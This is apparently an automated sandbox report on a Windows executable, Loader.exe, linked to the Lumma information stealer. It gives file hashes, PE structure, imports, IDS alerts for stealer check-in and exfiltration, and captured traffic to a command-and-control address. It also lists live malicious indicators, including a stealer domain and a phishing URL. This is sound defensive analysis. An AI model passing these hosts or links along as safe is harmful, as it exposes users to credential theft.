HCA Information:	Successful, ratio: 95% Number of executed functions: 48 Number of non-executed functions: 146
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
20:17:05	API Interceptor	8x Sleep call for process: Loader.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.145.201	https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSLMas8wKe7Ih4zqBiyHkarn0j5lOr9uX2Ipi5t6mu5SV-2B1JsyP5-2FhfNtTtQOlKj0flyS3vwLeKaJ6ckzVjuZims-3DLeyB_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aTBg62vcUAgkYbCAf46MpAyc7W7GFqvL6adNxNCTlmXTIiiRHR0fGeBxBsxNA5VbYoJQJb-2FJYi0QkLgjAoVYrRvTi1dn7pPo7PbeQWMcs70s7UFE7WeCgk9rDpKP4binyuu0CEbckceaS6ycGVUXPi2325g7v8hitus3ay9MICEoPWHxYePXARIxPiq-2FS9xmhqxVG-2BsRc9-2BU2VqX-2BZB9nYYuSKeNDIvkVaXKl7x-2FFSxF7xXa4BaT30eg9SUGZbRvZ8-3D#C?email=test@test.com	Get hash	malicious	Captcha Phish	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
volcanohushe.click	bas.exe	Get hash	malicious	LummaC	Browse	104.21.71.155

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	AxoPac.exe	Get hash	malicious	LummaC	Browse	172.67.184.241
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.169.205
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.96.6
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.96.6
	'Set-up.exe	Get hash	malicious	LummaC	Browse	172.67.169.205
	setup.exe	Get hash	malicious	LummaC	Browse	172.67.191.144
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.27.229
	installer.msi	Get hash	malicious	Unknown	Browse	104.21.80.93
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.58.45

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.145.201
	AxoPac.exe	Get hash	malicious	LummaC	Browse	172.67.145.201
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.145.201
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.145.201
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.145.201
	'Set-up.exe	Get hash	malicious	LummaC	Browse	172.67.145.201
	setup.exe	Get hash	malicious	LummaC	Browse	172.67.145.201
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.145.201
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.145.201
	AutoUpdate.exe	Get hash	malicious	LummaC	Browse	172.67.145.201

Dropped Files

⊘No context

Created / dropped Files

\Device\ConDrv

Download File

Process:	C:\Users\user\Desktop\Loader.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	15
Entropy (8bit):	3.906890595608518
Encrypted:	false
SSDEEP:	3:SXhRi75n:SC5
MD5:	3A33AF4BC7DC9699EE324B91553C2B46
SHA1:	4CCE2BF1011CA006FAAB23506A349173ACC40434
SHA-256:	226D20C16ED4D8DDDFD00870E83E3B6EEDEDB86704A7BF43B5826B71D61500AE
SHA-512:	960194C8B60C086520D1A76B94F52BA88AC2DDEC76A18B2D7ABF758FFFF138E9EDD23E62D4375A34072B42FBA51C6D186554B1AA71D60835EF1E18BEB8873B1D
Malicious:	false
Reputation:	low
Preview:	1.29548Enjoy!..

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	7.614610454522393
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Loader.exe
File size:	540'160 bytes
MD5:	245d1f68f4e8caffb294d206958761e5
SHA1:	d80d3805309b53632aabb56a1a3284c1e8ba6c26
SHA256:	397c3c9ce2aff57799b4620f05103733cc2489f91df6da545b5c1e5ac4350ebb
SHA512:	973fa8759e30a9718518f6d106fb147b35f7c56c40c2092aa860d67a7a82dfd1b2f11cd45d929652e86498dfcc7e01e3a8726c0af513cc6cbf392cc98519612c
SSDEEP:	12288:luB9du8NOZx84E5YoS7OJlnDYrPLPJgu4dgT6lYDfAmy/yqv/kheLk:u9du88Zx8VAeDgPLxZ4GO+y4heQ
TLSH:	13B4E011B580C072DC63147798B6EBAA863EF9200F22AADFA7940D7ADF352D19731717
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...WZig..........".................R.............@.......................................@.................................dH..<..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x40ef52
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
Time Stamp:	0x67695A57 [Mon Dec 23 12:40:55 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	5cc7e689f2864a0a9a8589c00efad8df

Entrypoint Preview

Instruction
call 00007FF9E4BC8A0Ah
jmp 00007FF9E4BC8879h
mov ecx, dword ptr [00436840h]
push esi
push edi
mov edi, BB40E64Eh
mov esi, FFFF0000h
cmp ecx, edi
je 00007FF9E4BC8A06h
test esi, ecx
jne 00007FF9E4BC8A28h
call 00007FF9E4BC8A31h
mov ecx, eax
cmp ecx, edi
jne 00007FF9E4BC8A09h
mov ecx, BB40E64Fh
jmp 00007FF9E4BC8A10h
test esi, ecx
jne 00007FF9E4BC8A0Ch
or eax, 00004711h
shl eax, 10h
or ecx, eax
mov dword ptr [00436840h], ecx
not ecx
pop edi
mov dword ptr [00436880h], ecx
pop esi
ret
push ebp
mov ebp, esp
sub esp, 14h
lea eax, dword ptr [ebp-0Ch]
xorps xmm0, xmm0
push eax
movlpd qword ptr [ebp-0Ch], xmm0
call dword ptr [00434AC4h]
mov eax, dword ptr [ebp-08h]
xor eax, dword ptr [ebp-0Ch]
mov dword ptr [ebp-04h], eax
call dword ptr [00434A78h]
xor dword ptr [ebp-04h], eax
call dword ptr [00434A74h]
xor dword ptr [ebp-04h], eax
lea eax, dword ptr [ebp-14h]
push eax
call dword ptr [00434B0Ch]
mov eax, dword ptr [ebp-10h]
lea ecx, dword ptr [ebp-04h]
xor eax, dword ptr [ebp-14h]
xor eax, dword ptr [ebp-04h]
xor eax, ecx
leave
ret
mov eax, 00004000h
ret
push 00437E18h
call dword ptr [00434AE4h]
ret
mov al, 01h
ret
push 00030000h
push 00010000h
push 00000000h
call 00007FF9E4BD01EBh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x34864	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x3a000	0x1d70	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x30d08	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2d008	0xc0	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x34a0c	0x16c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2a52b	0x2a600	ca7697ad91eaacd837ed51179759a947	False	0.5367809734513275	data	6.539348053061756	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2c000	0x9d7c	0x9e00	964f1e27d13bf05fbdae349f651c8112	False	0.4288221914556962	data	4.95389314063731	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x36000	0x25e4	0x1600	f9cffcfbe2a982ed0d73caf2c5c26405	False	0.40678267045454547	data	4.770466622070642	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x39000	0x9	0x200	1f354d76203061bfdd5a53dae48d5435	False	0.033203125	data	0.020393135236084953	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x3a000	0x1d70	0x1e00	050a442cf25b388dea29342e31853d9f	False	0.7709635416666667	data	6.524650010128688	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.bss	0x3c000	0x4be00	0x4be00	e6f22ba3cc87ac612cb16657017e76f9	False	1.0003249845551894	data	7.999371959704677	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL

Import

KERNEL32.dll

AcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, CreateThread, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, ExitThread, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryAndExitThread, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, WaitForSingleObjectEx, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile

USER32.dll

DefWindowProcW

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-24T02:17:04.845791+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49708	172.67.145.201	443	TCP
2024-12-24T02:17:05.854185+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	49708	172.67.145.201	443	TCP
2024-12-24T02:17:05.854185+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49708	172.67.145.201	443	TCP
2024-12-24T02:17:07.080105+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49709	172.67.145.201	443	TCP
2024-12-24T02:17:07.871102+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.6	49709	172.67.145.201	443	TCP
2024-12-24T02:17:07.871102+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49709	172.67.145.201	443	TCP
2024-12-24T02:17:09.470936+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49710	172.67.145.201	443	TCP
2024-12-24T02:17:12.305800+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49712	172.67.145.201	443	TCP
2024-12-24T02:17:15.429568+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49723	172.67.145.201	443	TCP
2024-12-24T02:17:18.748829+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49730	172.67.145.201	443	TCP
2024-12-24T02:17:19.521214+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.6	49730	172.67.145.201	443	TCP
2024-12-24T02:17:21.891648+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49743	172.67.145.201	443	TCP
2024-12-24T02:17:26.564441+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49754	172.67.145.201	443	TCP
2024-12-24T02:17:27.334990+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49754	172.67.145.201	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 24, 2024 02:17:03.621469975 CET	49708	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:03.621511936 CET	443	49708	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:03.621583939 CET	49708	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:03.625793934 CET	49708	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:03.625809908 CET	443	49708	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:04.845710993 CET	443	49708	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:04.845791101 CET	49708	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:04.909502983 CET	49708	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:04.909523964 CET	443	49708	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:04.909878969 CET	443	49708	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:04.957793951 CET	49708	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:05.081316948 CET	49708	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:05.081316948 CET	49708	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:05.081433058 CET	443	49708	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:05.854080915 CET	443	49708	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:05.854187965 CET	443	49708	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:05.854253054 CET	49708	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:05.856393099 CET	49708	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:05.856406927 CET	443	49708	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:05.866286039 CET	49709	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:05.866311073 CET	443	49709	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:05.866391897 CET	49709	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:05.866713047 CET	49709	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:05.866729021 CET	443	49709	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:07.079993010 CET	443	49709	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:07.080105066 CET	49709	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:07.081573009 CET	49709	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:07.081589937 CET	443	49709	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:07.081918955 CET	443	49709	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:07.086178064 CET	49709	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:07.086205006 CET	49709	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:07.086276054 CET	443	49709	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:07.871071100 CET	443	49709	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:07.871130943 CET	443	49709	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:07.871253967 CET	49709	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:07.871345997 CET	443	49709	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:07.871809006 CET	443	49709	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:07.871860027 CET	49709	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:07.871879101 CET	443	49709	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:07.873501062 CET	443	49709	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:07.873557091 CET	49709	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:07.873572111 CET	443	49709	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:07.879357100 CET	443	49709	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:07.879421949 CET	49709	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:07.879436016 CET	443	49709	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:07.887686014 CET	443	49709	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:07.887754917 CET	49709	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:07.887770891 CET	443	49709	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:07.943764925 CET	49709	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:07.943804979 CET	443	49709	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:07.989041090 CET	49709	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:07.991450071 CET	443	49709	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:08.035926104 CET	49709	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:08.063085079 CET	443	49709	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:08.066898108 CET	443	49709	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:08.066950083 CET	49709	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:08.066972971 CET	443	49709	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:08.067027092 CET	443	49709	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:08.067091942 CET	49709	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:08.067508936 CET	49709	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:08.067529917 CET	443	49709	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:08.067558050 CET	49709	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:08.067573071 CET	443	49709	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:08.257098913 CET	49710	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:08.257142067 CET	443	49710	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:08.257227898 CET	49710	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:08.257570982 CET	49710	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:08.257580996 CET	443	49710	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:09.470782042 CET	443	49710	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:09.470936060 CET	49710	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:09.472242117 CET	49710	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:09.472249031 CET	443	49710	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:09.472562075 CET	443	49710	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:09.478351116 CET	49710	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:09.478506088 CET	49710	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:09.478533983 CET	443	49710	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:10.543795109 CET	443	49710	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:10.543889046 CET	443	49710	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:10.543939114 CET	49710	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:10.558837891 CET	49710	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:10.558851957 CET	443	49710	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:11.091346025 CET	49712	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:11.091399908 CET	443	49712	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:11.091481924 CET	49712	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:11.091866016 CET	49712	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:11.091883898 CET	443	49712	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:12.305706978 CET	443	49712	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:12.305799961 CET	49712	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:12.307281971 CET	49712	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:12.307291985 CET	443	49712	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:12.307534933 CET	443	49712	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:12.312709093 CET	49712	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:12.312884092 CET	49712	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:12.312927961 CET	443	49712	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:12.313000917 CET	49712	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:12.355340004 CET	443	49712	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:13.544833899 CET	443	49712	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:13.544944048 CET	443	49712	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:13.544994116 CET	49712	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:13.546232939 CET	49712	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:13.546250105 CET	443	49712	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:14.213356972 CET	49723	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:14.213399887 CET	443	49723	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:14.213489056 CET	49723	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:14.213891983 CET	49723	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:14.213901043 CET	443	49723	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:15.429491997 CET	443	49723	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:15.429568052 CET	49723	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:15.430779934 CET	49723	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:15.430788040 CET	443	49723	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:15.431036949 CET	443	49723	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:15.432377100 CET	49723	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:15.432560921 CET	49723	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:15.432590008 CET	443	49723	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:15.432653904 CET	49723	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:15.432662964 CET	443	49723	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:16.397047997 CET	443	49723	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:16.397178888 CET	443	49723	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:16.397255898 CET	49723	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:16.422259092 CET	49723	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:16.422307014 CET	443	49723	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:17.534132004 CET	49730	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:17.534174919 CET	443	49730	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:17.534243107 CET	49730	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:17.534568071 CET	49730	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:17.534579992 CET	443	49730	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:18.748744965 CET	443	49730	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:18.748828888 CET	49730	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:18.750593901 CET	49730	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:18.750602961 CET	443	49730	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:18.750850916 CET	443	49730	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:18.752547979 CET	49730	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:18.752631903 CET	49730	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:18.752636909 CET	443	49730	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:19.521193027 CET	443	49730	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:19.521296024 CET	443	49730	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:19.521373987 CET	49730	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:19.618077993 CET	49730	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:19.618114948 CET	443	49730	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:20.660115004 CET	49743	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:20.660162926 CET	443	49743	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:20.660300016 CET	49743	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:20.660670996 CET	49743	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:20.660687923 CET	443	49743	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:21.891585112 CET	443	49743	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:21.891648054 CET	49743	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:21.893668890 CET	49743	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:21.893678904 CET	443	49743	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:21.893909931 CET	443	49743	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:21.905814886 CET	49743	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:21.906673908 CET	49743	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:21.906719923 CET	443	49743	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:21.906917095 CET	49743	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:21.906950951 CET	443	49743	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:21.907077074 CET	49743	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:21.907125950 CET	443	49743	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:21.907258034 CET	49743	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:21.907293081 CET	443	49743	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:21.907413960 CET	49743	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:21.907453060 CET	443	49743	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:21.907589912 CET	49743	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:21.907644987 CET	443	49743	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:21.907655001 CET	49743	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:21.907665014 CET	443	49743	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:21.907835007 CET	49743	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:21.907864094 CET	443	49743	172.67.145.201	192.168.2.6
Dec 24, 2024 02:17:21.907882929 CET	49743	443	192.168.2.6	172.67.145.201
Dec 24, 2024 02:17:21.908013105 CET	49743	443	192.168.2.6	172.67.145.201
